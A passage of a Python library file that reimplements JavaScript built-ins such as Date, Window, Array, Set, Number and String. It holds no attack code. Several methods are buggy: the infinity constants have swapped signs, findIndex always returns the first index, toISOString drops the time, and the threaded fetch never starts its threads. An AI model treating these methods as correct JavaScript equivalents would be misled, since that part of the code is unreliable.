self.setMonth(month) # return self.getTime() def setUTCSeconds(self, seconds): """ Set the seconds of a date object, according to universal time """ self.setSeconds(seconds) # return self.getTime() def setYear(self, year): """ Deprecated. Use the setFullYear() method instead """ self.date.replace(year=int(year)) # return self.getTime() # TODO - there may not be a date object already? def toDateString(self): """ Converts the date portion of a Date object into a readable string """ return self.date.strftime('%Y-%m-%d') def toUTCString(self): """ Converts a Date object to a string, according to universal time """ return self.date.strftime('%Y-%m-%d %H:%M:%S') def toGMTString(self): """ Deprecated. Use the toUTCString() method instead """ return self.toUTCString() def toJSON(self): """ Returns the date as a string, formatted as a JSON date """ return json.dumps(self.date.strftime('%Y-%m-%d')) def toISOString(self): """ Returns the date as a string, using the ISO standard """ return self.date.strftime('%Y-%m-%d') def toLocaleDateString(self): """ Returns the date portion of a Date object as a string, using locale conventions """ return self.date.strftime('%x') def toLocaleString(self): """ Converts a Date object to a string, using locale conventions """ return self.date.strftime('%x') def toLocaleTimeString(self): """ Returns the time portion of a Date object as a string, using locale conventions """ return self.date.strftime('%X') def toTimeString(self): """ Converts the time portion of a Date object to a string """ return self.date.strftime('%X') def UTC(self): """ Returns the number of milliseconds in a date since midnight of January 1, 1970, according to UTC time """ return self.date.utcnow() class Screen: """ screen """ # wrap a lib? # https://github.com/rr-/screeninfo? def __init__(self): # from sys import platform # if platform == "linux" or platform == "linux2": # # linux # import subprocess # resuls = subprocess.Popen(['xrandr'],stdout=subprocess.PIPE).communicate()[0].split("current")[1].split(",")[0] # width = resuls.split("x")[0].strip() # heigth = resuls.split("x")[1].strip() # print width + "x" + heigth # elif platform == "darwin": # # OS X # results = str(subprocess.Popen(['system_profiler SPDisplaysDataType'],stdout=subprocess.PIPE, shell=True).communicate()[0]) # res = re.search('Resolution: \d* x \d*', results).group(0).split(' ') # width, height = res[1], res[3] # return width, height # elif platform == "win32": # from win32api import GetSystemMetrics # print("Width =", GetSystemMetrics(0)) # print("Height =", GetSystemMetrics(1)) pass def availHeight(self): ''' Returns the height of the screen (excluding the Windows Taskbar) ''' # return self.height raise NotImplementedError def availWidth(self): ''' Returns the width of the screen (excluding the Windows Taskbar) ''' raise NotImplementedError def colorDepth(self): ''' Returns the colorDepth ''' raise NotImplementedError def height(self): ''' Returns the total height of the screen ''' raise NotImplementedError def pixelDepth(self): ''' Returns the pixelDepth ''' raise NotImplementedError def width(self): ''' Returns the total width of the screen ''' raise NotImplementedError class ProgramKilled(Exception): pass class Job(threading.Thread): def __init__(self, interval, execute, *args, **kwargs): threading.Thread.__init__(self) self.daemon = False self.stopped = threading.Event() self.interval = interval self.execute = execute self.args = args self.kwargs = kwargs def stop(self): self.stopped.set() self.join() def run(self): while not self.stopped.wait(self.interval.total_seconds()): self.execute(*self.args, **self.kwargs) # def __str__(self): # return "Job every %s" % self.interval class SetInterval: def signal_handler(self, signum, frame): raise ProgramKilled def __init__(self, function, time, *args, **kwargs): signal.signal(signal.SIGTERM, self.signal_handler) signal.signal(signal.SIGINT, self.signal_handler) self.job = Job(datetime.timedelta(microseconds=time * 1000), function, *args, **kwargs) self.job.start() # def stop(self): # self.job.stop() class Promise: # undocumented - warning. use at own risk def __init__(self, func=None, *args, **kwargs): # print('init') self.data = None self.state = 'pending' # fullfilled, rejected if func is not None: func(self.resolve, self.reject) def then(self, func): if func is not None: # print('--->',self.data) self.data = func(self.data) # print('-->',self.data) return self def catch(self, error): # func(error) print(error) return self def resolve(self, data): # print( 'resolve called::', data ) self.data = data self.state = "fulfilled" return self def reject(self, data): self.data = data self.state = "rejected" return self # def __str__(self): # try: # return self.data.text # except Exception as e: # print(e) # return str(self) class FetchedSet: # not a promise def __init__(self, *args, **kwargs): self.results = [] def __getitem__(self, index): return self.results[index] def oncomplete(self, func): # runs once all results are back func(self.results) return # def __call__(self, func): # self.results.append(func) class Window: """ window """ localStorage = Storage() location = 'eventual.technology' def __init__(self, *args, **kwargs): # self.console = dom.console # self.document = Document # globals()? # dir()? # locals()? pass # TODO - tell users to use other window class if methods are called. @staticmethod def alert(msg): """ Displays an alert box with a message and an OK button """ print(msg) return @staticmethod def prompt(msg, default_text=""): """ Displays a dialog box that prompts the visitor for input """ print(msg) data = input() return data setTimeout = Global.setTimeout clearTimeout = Global.clearTimeout @staticmethod def clearInterval(job): job.stop() @staticmethod def setInterval(function, time, *args, **kwargs): interval_ID = SetInterval(function, time, *args, **kwargs) return interval_ID.job @staticmethod def _do_request(url, f=None, **kwargs): # private - don't use directly. use one of the fetch methods try: # r = requests.get(url, timeout=3) from requests import Request, Session method = "GET" if "method" in kwargs: method = kwargs["method"] if "callback_function" in kwargs: del kwargs["callback_function"] if "error_handler" in kwargs: del kwargs["error_handler"] s = Session() req = Request(method, url) prepped = s.prepare_request(req) r = s.send(prepped, **kwargs) # print(r.status_code) s.close() if f is not None and type(f) is FetchedSet: f.results.append(r) return r except Exception as e: print(f'Request Failed for URL: {url}', e) return None @staticmethod def fetch(url: str, **kwargs): # undocumented - warning. use at own risk # note - kinda pointless atm. just use requests directly and you wont have to muck about with a Promise if type(url) is not str: raise ValueError('fetch takes a single url string. use fetch_set, fetch_threaded or fetch_pooled') f = Promise() r = window._do_request(url, f, *kwargs) return f.resolve(r) @staticmethod def fetch_set(urls: list, callback_function=None, error_handler=None, **kwargs): # undocumented - warning. use at own risk # note - still blocks. just gets all before continuing # problems - all urls can only have 1 associated callback, error and set of kwargs if type(urls) is str: urls = [urls] # leniency f = FetchedSet() for url in urls: r = window.fetch(url, **kwargs).then(callback_function) f.results.append(r.data) return f @staticmethod def fetch_threaded(urls: list, callback_function=None, error_handler=None, **kwargs): # undocumented - warning. use at own risk # note - still blocks. just gets all before continuing using threads # problems - all urls can only have 1 associated callback, error and set of kwargs if type(urls) is str: urls = [urls] # leniency f = FetchedSet() jobs = [] for url in urls: thread = threading.Thread(target=window._do_request(url, f, **kwargs)) # thread.setDaemon(True) # deprecated thread.daemon = True jobs.append(thread) map(lambda j: j.start(), jobs) map(lambda j: j.join(), jobs) # f = FetchedSet() return f @staticmethod def fetch_pooled(urls: list, callback_function=None, error_handler=None, **kwargs): # undocumented - warning. use at own risk # note - still blocks. just gets all before continuing using a pool # problems - all urls can only have 1 associated callback, error and set of kwargs if type(urls) is str: urls = [urls] # leniency f = FetchedSet() def _do_request_wrapper(obj): url = obj['url'] f = obj['f'] kwargs = obj['k'] kwargs['callback_function'] = obj['c'] kwargs['error_handler'] = obj['e'] window._do_request(url, f, **kwargs) jobs = [] p = Pool() urls = [{'url': url, 'f': f, 'c': callback_function, 'e': error_handler, 'k': kwargs} for url in urls] results = p.map(_do_request_wrapper, urls) p.close() p.join() return f # def fetch_aysnc( urls: list, options={}, type="async" ): # TODO - a version using async/await @staticmethod def btoa(dataString): """ Encodes a string in base-64 """ import base64 dataBytes = dataString.encode("utf-8") encoded = base64.b64encode(dataBytes) return encoded @staticmethod def atob(dataString): """ Decodes a base-64 encoded string """ import base64 return base64.b64decode(dataString).decode() @staticmethod def requestAnimationFrame(callback): """[requests a frame of an animation] Args: callback (callable): [the callback function] Returns: [type]: [description] """ perf = Global.performance.now() return callback(perf) # these probably should have been on global. will see about moving them later setInterval = Window.setInterval clearInterval = Window.clearInterval Global.setInterval = Window.setInterval Global.clearInterval = Window.clearInterval window = Window class Array: """ javascript array """ @staticmethod def from_(obj): # TODO - test """ Creates a new Array instance from an array-like or iterable object. """ # return Array(object) if isinstance(obj, Array): return obj elif isinstance(obj, list): return Array(*obj) elif isinstance(obj, tuple): items = list(obj) return Array(*items) elif isinstance(obj, dict): items = list(obj.items()) return Array(*items) # if it is iterable unpack it elif hasattr(obj, '__iter__'): items = list(obj) return Array(*items) else: return Array([obj]) @staticmethod def of(*args): # TODO - test """ Creates a new Array instance with a variable number of arguments, regardless of number or type of the arguments. """ return Array(args) def __init__(self, *args): """[An Array that behaves like a js array] """ # casting if len(args) == 1: if isinstance(args[0], list): self.args = args[0] return elif isinstance(args[0], int): # self.args = [None] * args[0] # self.args = [null()] * args[0] self.args = [""] * args[0] return self.args = list(args) self.prototype = self def __getitem__(self, index): return self.args[index] def __getattribute__(self, name): try: return super().__getattribute__(name) except AttributeError: # if its a list method get it from args if name in dir(list): return getattr(self.args, name) def __setitem__(self, index, value): self.args[index] = value def __add__(self, value): if isinstance(value, int): raise ValueError('int not supported') if isinstance(value, Array): self.args = self.args + value.args if isinstance(value, list): self.args = self.args + value return self.args def __len__(self): return len(self.args) def __eq__(self, other): if isinstance(other, Array): return self.args == other.args if isinstance(other, list): return self.args == other return False def __ne__(self, other): return not self.__eq__(other) def __repr__(self): return str(self.args) def __iter__(self): for i in self.args: yield i # self.args.__iter__() def __sub__(self, value): if isinstance(value, int): raise ValueError('int not supported') if isinstance(value, Array): self.args = self.args - value.args if isinstance(value, list): self.args = self.args - value return self.args def toString(self): ''' Converts an array to a string, and returns the result ''' return str(self.args) # TODO - check what js does def toSource(self): """ Returns the source array. """ return list(self.args) @property def length(self): """ Sets or returns the number of elements in an array """ return len(self.args) def concat(self, *args): """[Joins two or more arrays, and returns a copy of the joined arrays] Returns: [list]: [returns a copy of the joined arrays] """ for a in args: self.args += a return self.args def flat(self, depth=1): # TODO - test """[Flattens an array into a single-dimensional array or a depth of arrays] """ if depth < 1: raise ValueError('depth must be greater than 0') if depth == 1: return self.args flat = [] for i in self.args: flat += i.flat(depth - 1) return flat def flatMap(self, fn): # TODO - test """[Maps a function over an array and flattens the result] """ return Array(fn(i) for i in self.args) def fill(self, value=None, start=None, end=None): """[Fills elements of an array from a start index to an end index with a static value] """ if start is None: start = 0 if end is None: end = len(self.args) for i in range(start, end): self.args[i] = value return self.args def groupBy(self, callback) -> dict: # TODO - test """[Groups the elements of an array according to the result of calling a callback function on each element] Args: callback (callable): [the callback recieves the following paramters(value, index, target)] Returns: [dict]: [a dictionary of arrays] """ groups = {} for i in range(len(self.args)): key = callback(self.args[i], i, self.args) if key in groups: groups[key].append(self.args[i]) else: groups[key] = [self.args[i]] return groups # def groupByToMap(self, callback): # """[returns a Map object] # """ # groups = {} # for i in range(len(self.args)): # key = callback(self.args[i], i, self.args) # if key in groups: # groups[key].append(self.args[i]) # else: # groups[key] = [self.args[i]] # return Map(groups) def findLast(self, callback): """[Returns the last element in an array that passes a test] """ for i in range(len(self.args) - 1, -1, -1): if callback(self.args[i], i, self.args): return self.args[i] return None def findLastIndex(self, callback): """[Returns the last index of an element in an array that passes a test] """ for i in range(len(self.args) - 1, -1, -1): if callback(self.args[i], i, self.args): return i return -1 def includes(self, value): # -> bool: """[Check if an array contains the specified item Args: value ([any]): [any value] Returns: [bool]: [a boolean] """ if value in self.args: return True else: return False def indexOf(self, value): """ Search the array for an element and returns its position """ # for count, each in enumerate(self.args): # if each == value: # return count try: return self.args.index(value) except ValueError: return -1 except Exception as e: # print(e) return -1 @staticmethod def isArray(thing): """[Checks whether an object is an array] Args: thing ([type]): [thing to check] Returns: [bool]: [True if the object is list, tuple or Array] """ if isinstance(thing, (list, tuple, Array)): return True else: return False def join(self, value): """ Joins all elements of an array into a string """ # TODO - get passed param names return value.join([str(x) for x in self.args]) def lastIndexOf(self, value): """ Search the array for an element, starting at the end, and returns its position """ try: return len(self.args) - self.args[::-1].index(value) - 1 except Exception as e: # print(e) return None def pop(self): """ Removes the last element of an array, and returns that element """ # item = self.args[len(self.args)-1] # del self.args[len(self.args)-1] return self.args.pop() def push(self, value): """ Adds new elements to the end of an array, and returns the new length """ self.args.append(value) return len(self.args) def reverse(self): """ Reverses the order of the elements in an array """ self.args = self.args[::-1] return self.args def slice(self, start=0, stop=None, step=1): """[Selects a part of an array, and returns the new array] Args: start ([int]): [index to slice from] stop ([int], optional): [index to slice to]. Defaults to end of the array. step (int, optional): [description]. Defaults to 1. Returns: [type]: [new array] """ if stop is None: stop = len(self.args) return self.args[slice(start, stop, step)] def splice(self, start, delete_count=None, *items): """ Selects a part of an array, and returns the new array """ if delete_count is None: delete_count = len(self.args) - start total = start + delete_count removed = self.args[start:total] self.args[start:total] = items return removed # return self.args def unshift(self, *args): """[Adds new elements to the beginning of an array, and returns the new length] Returns: [int]: [the length of the array] """ for i in reversed(args): self.args.insert(0, i) return len(self.args) def shift(self): """[removes the first element from an array and returns that removed element] Returns: [type]: [the removed array element] """ item = self.args[0] del self.args[0] return item def map(self, func): """[Creates a new array with the result of calling a function for each array element] Args: func ([type]): [a function to call on each array element] Returns: [list]: [a new array] """ # print(func) return [func(value) for value in self.args] # return map(self.args, func) def some(self, func): """ Checks if any of the elements in an array pass a test """ return any(func(value) for value in self.args) def sort(self, func=None): # , *args, **kwargs): """ Sorts the elements of an array """ if func is not None: return self.args.sort(key=func(*self.args)) def comp(o): return str(o) # manually sort lexicographically for i in range(len(self.args)): for j in range(i + 1, len(self.args)): if comp(self.args[i]) > comp(self.args[j]): self.args[i], self.args[j] = self.args[j], self.args[i] return self.args def reduce(self, callback, initialValue=None): """ Reduces the array to a single value (going left-to-right) callback recieve theses parameters: previousValue, currentValue, currentIndex, array """ arguments = self.args if initialValue is None: initialValue = arguments[0] arguments = arguments[1:] for i, value in enumerate(arguments): import inspect if len(inspect.signature(callback).parameters) == 4: initialValue = callback(initialValue, value, i, arguments) elif len(inspect.signature(callback).parameters) == 3: initialValue = callback(initialValue, value, i) elif len(inspect.signature(callback).parameters) == 2: initialValue = callback(initialValue, value) elif len(inspect.signature(callback).parameters) == 1: initialValue = callback(initialValue) else: raise Exception("Callback does not have the correct number of parameters") return initialValue def reduceRight(self, callback, initialValue=None): """ Reduces the array to a single value (going right-to-left) callback recieve theses parameters: previousValue, currentValue, currentIndex, array """ arguments = self.args if initialValue is None: initialValue = arguments[-1] arguments = arguments[:-1] for i, value in enumerate(reversed(arguments)): import inspect if len(inspect.signature(callback).parameters) == 4: initialValue = callback(initialValue, value, i, arguments) elif len(inspect.signature(callback).parameters) == 3: initialValue = callback(initialValue, value, i) elif len(inspect.signature(callback).parameters) == 2: initialValue = callback(initialValue, value) elif len(inspect.signature(callback).parameters) == 1: initialValue = callback(initialValue) else: raise Exception("Callback does not have the correct number of parameters") return initialValue def filter(self, func): """ Creates a new array with every element in an array that pass a test i.e. even_numbers = someArr.filter( lambda x: x % 2 == 0 ) """ # written by .ai (https://6b.eleuther.ai/) # filtered = [] # for value in self.args: # if func(value): # filtered.append(value) # return filtered return list(filter(func, self.args)) def find(self, func): """ Returns the value of the first element in an array that pass a test """ for each in self.args: if func(each): return each def findIndex(self, value): """ Returns the index of the first element in an array that pass a test """ # written by .ai (https://6b.eleuther.ai/) for i, value in enumerate(self.args): if value == value: return i return -1 def forEach(self, func): """ Calls a function for each array element """ # written by .ai (https://6b.eleuther.ai/) for value in self.args: func(value) # TODO - is this supposed to pass count like Node list? i.e. # for i in range(len(self.args)): # func(self.args[i], i, self.args) def keys(self): """ Returns a Array Iteration Object, containing the keys of the original array """ for i in self.args: yield i def copyWithin(self, target, start=0, end=None): """ Copies array elements within the array, from start to end """ if end is None: end = len(target) for i in range(start, end): self.args[i] = target[i] def entries(self): """[Returns a key/value pair Array Iteration Object] Yields: [type]: [key/value pair] """ for i in self.args: yield [i, self.args[i]] def every(self, func): """[Checks if every element in an array pass a test] Args: func ([type]): [test function] Returns: [bool]: [if every array elemnt passed the test] """ return all(func(value) for value in self.args) def at(self, index: int): """[takes an integer value and returns the item at that index, allowing for positive and negative integers. Negative integers count back from the last item in the array.] Args: index ([type]): [position of item] Returns: [type]: [item at the given position] """ return self.args[index] Array.prototype = Array class Set(): def __init__(self, *args): """[The Set object lets you store unique values of any type, whether primitive values or object references. TODO - will need to store dictionaries unlike a python set https://stackoverflow.com/questions/34097959/add-a-dictionary-to-a-set-with-union ] """ self.args = set(args) def __iter__(self): return iter(self.args) def __len__(self): return len(self.args) def __contains__(self, item): return item in self.args def __repr__(self): return repr(self.args) def __str__(self): return str(self.args) @property def species(self): """ The constructor function that is used to create derived objects. """ # return self.args raise NotImplementedError @property def size(self): """ Returns the number of values in the Set object. """ return len(self.args) def add(self, value): """ Appends value to the Set object. Returns the Set object with added value. """ # print(type(self.args), value) self.args.add(value) return self.args def clear(self): """ Removes all elements from the Set object. """ self.args.clear() def delete(self, value): """ Removes the element associated to the value returns a boolean asserting whether an element was successfully removed or not. """ return self.args.remove(value) def has(self, value): """ Returns a boolean asserting whether an element is present with the given value in the Set object or not. """ return value in self.args def contains(self, value): """ Returns a boolean asserting whether an element is present with the given value in the Set object or not. """ return value in self.args # Set.prototype[@@iterator]() # Returns a new iterator object that yields the values for each element in the Set object in insertion order. def values(self): """ Returns a new iterator object that yields the values for each element in the Set object in insertion order. """ return iter(self.args) # def keys(self): # """ An alias for values """ #? # return self.values() def entries(self): """ Returns a new iterator object that contains an array of [value, value] for each element in the Set object, in insertion order. """ return iter([[i, self.args[i]] for i in self.args]) # This is similar to the Map object, so that each entry's key is the same as its value for a Set. def forEach(self, callbackFn, thisArg=None): """ Calls callbackFn once for each value present in the Set object, in insertion order. If a thisArg parameter is provided, it will be used as the this value for each invocation of callbackFn. """ for i in self.args: callbackFn(i, thisArg) class Number(float): """ javascript Number methods """ # print(sys.float_info) MAX_VALUE = list(sys.float_info)[0] MIN_VALUE = 5E-324 # CHANGE no longer > list(sys.float_info)[3] NEGATIVE_INFINITY = float("inf") #: Represents negative infinity (returned on overflow) Number POSITIVE_INFINITY = float("-inf") #: Represents infinity (returned on overflow) Number # prototype Allows you to add properties and methods to an object Number def __init__(self, x="", *args, **kwargs): self.x = Global.Number(x) def __add__(self, other): return self.x + other def __sub__(self, other): return self.x - other def __mul__(self, other): return self.x * other def __div__(self, other): return self.x / other def __mod__(self, other): return self.x % other def __pow__(self, other): return self.x ** other def __neg__(self): return -self.x def __pos__(self): return +self.x def __abs__(self): return abs(self.x) def __invert__(self): return ~self.x def __lt__(self, other): return self.x < other def __le__(self, other): return self.x <= other def __eq__(self, other): return self.x == other def __ne__(self, other): return self.x != other def __gt__(self, other): return self.x > other def __ge__(self, other): return self.x >= other def __and__(self, other): return self.x & other def __or__(self, other): return self.x | other def __xor__(self, other): return self.x ^ other def __lshift__(self, other): return self.x << other def __rshift__(self, other): return self.x >> other def __iadd__(self, other): return self.x + other def __isub__(self, other): return self.x - other def __imul__(self, other): return self.x * other def __idiv__(self, other): return self.x / other def __imod__(self, other): return self.x % other def __ipow__(self, other): return self.x ** other def __ilshift__(self, other): return self.x << other def __irshift__(self, other): return self.x >> other def __iand__(self, other): return self.x & other def __ior__(self, other): return self.x | other def __ixor__(self, other): return self.x ^ other def __floordiv__(self, other): return self.x // other def __rfloordiv__(self, other): return other // self.x def __ifloordiv__(self, other): return other // self.x def __truediv__(self, other): return self.x / other def __rtruediv__(self, other): return other / self.x def __itruediv__(self, other): return other / self.x def __rmod__(self, other): return other % self.x def isInteger(self): """ Checks whether a value is an integer """ return (type(self.x) == int) def isSafeInteger(self): """ Checks whether a value is a safe integer """ raise NotImplementedError def toExponential(self, num=None): """ Converts a number into an exponential notation """ if num is not None: exp = '{:e}'.format(Number(Number(self.x).toFixed(num))) else: exp = '{:e}'.format(self.x) if 'e' in str(self.x): exp = str(self.x) # python already converts. n = exp.split('e')[0].rstrip("0") e = exp.split('e')[1].replace('00', '0') if n == "0.": n = "0" if int(e) != 0: if int(e) < 10 and int(e) > -10: # TODO - not correct. lazy way to strip left 0s only e = e.replace('0', '') # print( "AND:", n, "e" , e ) if n.endswith('.'): n = n.strip('.') return n + "e" + e def toFixed(self, digits: int): """[formats a number using fixed-point notation.] Args: digits ([int]): [The number of digits to appear after the decimal point Returns: [str]: [A string representing the given number using fixed-point notation.] """ # print("DIGIT!", digits) if digits < 0: digits = 0 fstring = "{:." + str(digits) + "f}" return fstring.format(round(self.x, digits)) def toPrecision(self, precision): """[returns a string representing the Number object to the specified precision.] Args: precision ([int]): [An integer specifying the number of significant digits.] Returns: [str]: [A string representing a Number object in fixed-point or exponential notation rounded to precision significant digits] """ precision = int(precision) # return str(math.pow(self.x, precision)) # raise NotImplementedError return str(round(self.x, precision)) def toString(self, base: int): """[returns a string representing the specified Number object.] Args: base (int): [An integer in the range 2 through 36 specifying the base to use for representing numeric values.] Returns: [str]: [a string representing the specified Number object] """ if base is None: return str(self.x) import string digs = string.digits + string.ascii_letters if self.x < 0: sign = -1 elif self.x == 0: return digs[0] else: sign = 1 self.x *= sign digits = [] while self.x: digits.append(digs[int(self.x % base)]) self.x = int(self.x / base) if sign < 0: digits.append('-') digits.reverse() return ''.join(digits) class String: """ javascript String methods """ @staticmethod def fromCodePoint(codePoint: int): """ Converts a Unicode code point into a string """ return chr(codePoint) @staticmethod def toCodePoint(char: str): """ Converts a Unicode string into a code point """ return ord(char) @staticmethod def raw(string): """ Returns the string as-is """ import re return re.escape(string) # @staticmethod # def fromCharCode(code: int): # """ Converts a Unicode code point into a string """ # return chr(code) @staticmethod def toCharCode(char: str): """ Converts a Unicode string into a code point """ return ord(char) def __init__(self, x="", *args, **kwargs): # self.args = args # self.kwargs = kwargs self.x = str(x) def __str__(self): return self.x def __eq__(self, other): if isinstance(other, str): return self.x == other if isinstance(other, String): return self.x == other.x return False # def __repr__(self): # return self.x def __getitem__(self, item): # print(item) return self.x[item] def __add__(self, other): return self.x + other def __radd__(self, other): return self.x + other def __iadd__(self, other): return self.x + other def __sub__(self, other): return self.x - other def __rsub__(self, other): return other - self.x def __isub__(self, other): return self.x - other def __mul__(self, other): return self.x * int(other) def __rmul__(self, other): return self.x * int(other) def __imul__(self, other): return self.x * int(other) def split(self, expr) -> list: """[can split a string based on a regex] Args: expr ([str]): [valid regex or string to split on] Returns: [list]: [list of str] """ # if isinstance( expr, RegExp) import re # print( '>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.', type(expr) ) is_regex = False try: re.compile(expr) is_regex = True except re.error: is_regex = False if is_regex: return re.split(expr, self.x) else: return self.x.split(expr) def concat(self, *args, seperator: str = "") -> str: """[concatenates the string arguments to the calling string and returns a new string.] Args: seperator (str, optional): []. Defaults to "". Returns: [type]: [A new string containing the combined text of the strings provided.] """ args = list(args) args.insert(0, self.x) return seperator.join(args) # @staticmethod def charCodeAt(self, index: int) -> int: """ Returns the Unicode of the character at the specified index """ return ord(self.x[index]) # @staticmethod def fromCharCode(self, *codes) -> str: """ returns a string created from the specified sequence of UTF-16 code units """ return "".join([str(chr(x)) for x in codes]) @property def length(self) -> int: return len(self.x) def repeat(self, count: int) -> str: """ Returns a new string with a specified number of copies of an existing string """ return self.x * count def startsWith(self, x: str, start: int = None, end: int = None) -> bool: """ Checks whether a string begins with specified characters """ if start is None: start = 0 if end is None: end = len(x) # print(self.x.startswith(x, start, end)) return self.x.startswith(x, start, end) def substring(self, start: int, end: int = None) -> str: """ Extracts the characters from a string, between two specified indices """ if start < 0: start = 0 if end is None: end = len(self.x) return self.x[start:end] def endsWith(self, x: str, start: int = None, end: int = None) -> bool: """ Checks whether a string ends with specified string/characters """ if start is None: start = 0 if end is None: end = len(x) return self.x.endswith(x, start, end) def toLowerCase(self) -> str: """ Converts a string to lowercase letters """ return self.x.lower() def toUpperCase(self) -> str: """ Converts a string to uppercase letters """ return self.x.upper() def slice(self, start: int = 0, end: int = None) -> str: """ Selects a part of an string, and returns the new string """ if end is None: end = len(self.x) return self.x[start:end] def trim(self): """ Removes whitespace from both ends of a string """ return self.x.strip() def charAt(self, index: int) -> str: """[Returns the character at the specified index (position)] Args: index (int): [index position] Returns: [str]: [the character at the specified index. if the index is out of range, an empty string is returned.] """ try: return self.x[index] except IndexError: return "" def replace(self, old: str, new) -> str: """ Searches a string for a specified value, or a regular expression, and returns a new string where the specified values are replaced. only replaces first one. """ if callable(new): # return new(self.x, old) return re.sub(old, new, self.x) else: return self.x.replace(old, new, 1) # re.sub(r"regepx", "old", "new") # TODO - js one also takes a regex def replaceAll(self, old: str, new: str): """[returns a new string where the specified values are replaced. ES2021] Args: old ([str]): [word to remove] new ([str]): [word to replace it with] Returns: [str]: [new string with all occurences of old word replaced] """ return self.x.replace(old, new) # def localeCompare(): # """ Compares two strings in the current locale """ # pass def substr(self, start: int = 0, end: int = None): """ Extracts the characters from a string, beginning at a specified start position, and through the specified number of character """ if end is None: end = len(self.x) return self.x[start:start + end] def toLocaleLowerCase(self) -> str: """ Converts a string to lowercase letters, according to the host's locale """ # locale.setlocale() return self.x.lower() def toLocaleUpperCase(self) -> str: """ Converts a string to uppercase letters, according to the host's locale """ # locale.setlocale() return self.x.upper() def indexOf(self, searchValue: str, fromIndex: int = 0): """[returns the index within the calling String object of the first occurrence of the specified value, starting the search at fromIndex ] Args: searchValue (str): [The string value to search for.] fromIndex (int): [An integer representing the index at which to start the search] Returns: [type]: [The index of the first occurrence of searchValue, or -1 if not found.] """ try: return self.x.index(searchValue, fromIndex) except ValueError: return -1 def codePointAt(self, index: int): """[Returns the Unicode code point at the specified index (position)] Args: index (int): [index position] Returns: [type]: [the Unicode code point at the specified index (position)] """ return ord(self.x[index]) def padEnd(self, length: int, padChar: str = " ") -> str: """[Pads the end of a string with a specified character (repeated, if needed) to create a new string.] Args: length (int): [the length of the resulting string] padChar (str, optional): [the character to use for padding. Defaults to " "]. Returns: [str]: [the padded string] """ return str(self.x + padChar * (length - len(self.x))) def padStart(self, length: int, padChar: str = " ") -> str: """[Pads the start of a string with a specified character] Args: length (int): [the length of the resulting string] padChar (str, optional): [the character to use for padding. Defaults to " "]. Returns: [str]: [the padded string] """ return padChar * (length - len(self.x)) + self.x def localeCompare(self, comparisonString: str, locale: str = None, *args) -> int: """ method returns a number indicating whether a reference string comes before, or after, or is the same as the given string in sort order """ # if locale is None: # locale = self.locale # return locale.strcoll(self.x, comparisonString, *args) # pass # TODO - implement localeCompare raise NotImplementedError def trimStart(self, length: int): # TODO - huh?. length """[Removes whitespace from the beginning of a string.] Args: length (int): [the length of the resulting string] Returns: [str]: [the trimmed string] """ return self.x.lstrip() def trimEnd(self, length: int): # TODO - huh?. length """[Removes whitespace from the end of a string] Args: length (int): [the length of the resulting string] Returns: [type]: [the trimmed string] """ return self.x.rstrip() def includes(self, searchValue: str, position: int = 0) -> bool: """[returns true if the specified string is found within the calling String object,] Args: searchValue (str): [The string value to search for.] position (int, optional): [the position to search from]. Defaults to 0. Returns: [type]: [a boolean value indicating whether the search value was found.] """ return searchValue in self.x[position:] def search(self, searchValue: str, position: int = 0) -> bool: """[returns true if the specified string is found within the calling String object,] starting at the specified position. Args: searchValue (str): [The string value to search for.] position (int, optional): [the position to search from]. Defaults to 0. Returns: [type]: [a boolean value indicating whether the search value was found.] """ return searchValue in self.x[position:] def matchAll(self, pattern: str): """ Searches a string for a specified value, or a regular expression, and returns a new string where the specified values are replaced. only replaces first one. """ return re.sub(pattern, "", self.x) def match(self, pattern: str): """ Searches a string for a specified value, or a regular expression, and returns a new string where the specified values are replaced. only replaces first one. """ return re.match(pattern, self.x) def compile(self, pattern: str): """ Searches a string for a specified value, or a regular expression, and returns a new string where the specified values are replaced. only replaces first one. """ return re.compile(pattern) def lastIndexOf(self, searchValue: str, fromIndex: int = 0): """ returns the last index within the calling String object of the first occurrence of the specified value, starting the search at fromIndex """ return self.x.rindex(searchValue, fromIndex) # def test(self, pattern: str):? was this on string? # TODO - test all these def anchor(self, name: str): # from domonic.html import a # return a(str(self), _name=name) #TODO - no href bug return '<a name="{}">{}</a>'.format(name, self.x) def big(self): """[wraps the string in big tags] Returns: [str]: [the string in big tags] """ return "<big>" + self.x + "</big>" def blink(self): """[wraps the string in blink tags] Returns: [str]: [the string in blink tags] """ return "<blink>" + self.x + "</blink>" def bold(self): """[wraps the string in bold tags] Returns: [str]: [the string in bold tags] """ return "<b>" + self.x + "</b>" def fixed(self): """[wraps the string in fixed tags] Returns: [str]: [the string in fixed tags] """ return "<tt>" + self.x + "</tt>" def fontcolor(self, color: str): """[wraps the string in font tags with a specified color] Args: color (str): [the color to use] Returns: [str]: [the string in font tags] """ return "<font color=" + color + ">" + self.x + "</font>" def fontsize(self, size: str): """[wraps the string in font tags with a specified size] Args: size (str): [the size to use] Returns: [str]: [the string in font tags] """ return "<font size=" + size + ">" + self.x + "</font>" def italics(self): """[wraps the string in italics tags] Returns: [str]: [the string in italics tags] """ return "<i>" + self.x + "</i>" def link(self, url: str): """[wraps the string in a link tag] Args: url (str): [the url to use] Returns: [str]: [the string in a link tag] """ return "<a href=" + url + ">" + self.x + "</a>" def small(self): """[wraps the string in small tags] Returns: [str]: [the string in small tags] """ return "<small>" + self.x + "</small>" def strike(self): """[wraps the string in strike tags] Returns: [str]: [the string in strike tags] """ return "<strike>" + self.x + "</strike>" def sub(self): """[wraps the string in sub tags] Returns: [str]: [the string in sub tags] """ return "<sub>" + self.x + "</sub>" def sup(self): """[wraps the string in sup tags] Returns: [str]: [the string in sup tags] """ return "<sup>" + self.x + "</sup>" def div(self, *args, **kwargs): """[wraps the string in a div tag] Returns: [str]: [the string in a div tag] """ from domonic.html import div return div(self.x, *args, **kwargs) def webpage(self): """[wraps the string in a webpage] Returns: [str]: [the string as a webpage] """ from domonic.html import (body, h1, head, html, link, meta, script, style, title) content = html( head( title(self.x), script(""), style(""), meta(_charset="utf-8"), link(_rel="stylesheet", _href=""), ), body( h1(self.x), ), ) return str(content) def __call__(self, tag: str, **kwargs): """ lets you transform a string into a dom element with the string as the content. also accepts a list of kwargs to pass as attributes i.e >>> test = String("time to take a mo") >>> test('div', _style="font-color:red;") >>> str(test('div', _style="font-color:red;")) """ from domonic.dom import Document return Document.createElement(tag, self.x, **kwargs) class RegExp(): def __init__(self, expression, flags=""): self.expression = expression self.flags = flags.lower() #: A string that contains the flags of the RegExp object. # self.multiline # Whether or not to search in strings across multiple lines. # self.source # The text of the pattern. # self.sticky # Whether or not the search is sticky # self.lastIndex # The index at 